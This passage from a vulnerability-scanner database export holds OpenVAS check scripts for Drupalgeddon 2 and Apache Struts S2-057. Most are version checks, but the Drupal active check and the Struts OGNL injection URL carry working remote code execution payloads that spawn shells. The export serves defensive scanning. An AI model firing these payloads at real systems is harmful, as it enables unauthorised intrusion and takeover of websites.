\"?element_parents=account%2Fmail%2F%23value&ajax_form=1&_wrapper_format=drupal_ajax\";\n data = \"form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]=\" + check;\n req = http_post_put_req( port:port, url:url, data:data,\n add_headers:make_array( \"Content-Type\", \"application/x-www-form-urlencoded\" ) );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n # neNWIz2mlhti89hQ[{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"16\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n if( egrep( string:res, pattern:\"^\" + check + \"\\[\\{\" ) ) {\n\n info['\"HTTP POST\" body'] = data;\n info['URL'] = http_report_vuln_url( port:port, url:url, url_only:TRUE );\n\n report = 'By doing the following request:\\n\\n';\n report += text_format_table( array:info ) + '\\n\\n';\n report += 'it was possible to execute the \"printf\" command.';\n report += '\\n\\nResult:\\n\\n' + res;\n\n expert_info = 'Request:\\n'+ req + 'Response:\\n' + res + '\\n';\n security_message( port:port, data:report, expert_info:expert_info );\n exit( 0 );\n }\n}\n\n# Drupal 7\n# This needs 2 requests (see e.g. https://github.com/FireFart/CVE-2018-7600/blob/master/poc.py)\nurl1 = dir + \"/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=printf&name%5B%23markup%5D=\"+ check +\n \"&name%5B%23typ\";\ndata1 = \"form_id=user_pass&_triggering_element_name=name\";\n\nreq = http_post_put_req( port:port, url:url1, data:data1,\n add_headers:make_array( \"Content-Type\", \"application/x-www-form-urlencoded\" ) );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n\nbuild_id = eregmatch( pattern:'<input type=\"hidden\" name=\"form_build_id\" value=\"([^\"]+)\" />', string:res );\nif( ! isnull( build_id[1] ) ) {\n url2 = dir + \"/?q=file%2Fajax%2Fname%2F%23value%2F\" + build_id[1];\n data2 = \"form_build_id=\" + build_id[1];\n req = http_post_put_req( port:port, url:url2, data:data2,\n add_headers:make_array( \"Content-Type\", \"application/x-www-form-urlencoded\" ) );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n\n # wz8rLLg_3Uie91Rg[{\"command\":\"settings\",\"settings\":{\"basePath\":\"...\n if( egrep( string:res, pattern:\"^\" + check + \"\\[\\{\" ) ) {\n\n info['Req 1: \"HTTP POST\" body'] = data1;\n info['Req 1: URL'] = http_report_vuln_url( port:port, url:url1, url_only:TRUE );\n info['Req 2: \"HTTP POST\" body'] = data2;\n info['Req 2: URL'] = http_report_vuln_url( port:port, url:url2, url_only:TRUE );\n\n report = 'By doing the following subsequent requests:\\n\\n';\n report += text_format_table( array:info ) + '\\n\\n';\n report += 'it was possible to execute the \"printf\" command to return the data \"' + check + '\".';\n report += '\\n\\nResult:\\n\\n' + res;\n\n expert_info = 'Request:\\n'+ req + 'Response:\\n' + res + '\\n';\n security_message( port:port, data:report, expert_info:expert_info );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:32", "description": "A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4156-1 (drupal7 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4156-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704156\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-7600\");\n script_name(\"Debian Security Advisory DSA 4156-1 (drupal7 - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 00:00:00 +0200 (Thu, 29 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4156.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB[89]\");\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/drupal7\");\n script_tag(name:\"summary\", value:\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.52-2+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.32-1+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Windows, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310812583", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812583", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-002_win.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Windows, Version Check)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812583\");\n script_version(\"$Revision: 12012 $\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 09:55:26 +0530 (Thu, 29 Mar 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Windows, Version Check)\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9 or\n 8.4.6 or 8.5.1 or 7.58 or later. Please see the referenced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!drupalPort = get_app_port(cpe:CPE)) {\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:drupalPort, version_regex:\"^([0-9]+)\", exit_no_version:TRUE)) {\n exit(0);\n}\n\ndrupalVer = infos['version'];\npath = infos['location'];\n\nif(drupalVer =~ \"^(6\\.)\") {\n fix = \"Drupal 6 is End of Life.please contact a D6LTS vendor\";\n}\n\nif(drupalVer =~ \"^(8\\.2)\" || drupalVer == \"8.5.0\"){\n fix = \"8.5.1\";\n}\n\nif(drupalVer =~ \"^(8\\.)\" && version_in_range(version:drupalVer, test_version:\"8.3.0\", test_version2:\"8.3.8\")) {\n fix = \"8.3.9\";\n}\n\nif(drupalVer =~ \"^(8\\.)\" && version_in_range(version:drupalVer, test_version:\"8.4.0\", test_version2:\"8.4.5\")) {\n fix = \"8.4.6\";\n}\n\nif(drupalVer =~ \"^(7\\.)\" && version_in_range(version:drupalVer, test_version:\"7.0\", test_version2:\"7.57\")) {\n fix = \"7.58\";\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:drupalVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:drupalPort);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n \"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141029", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_win.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141029\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141028", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141028\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-b9ad458866", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874421", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_b9ad458866_drupal7_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-b9ad458866\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874421\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:21 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-b9ad458866\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b9ad458866\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GYT7R43FLLEEG4N2QS3FDGZ3NNHOL3HL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n 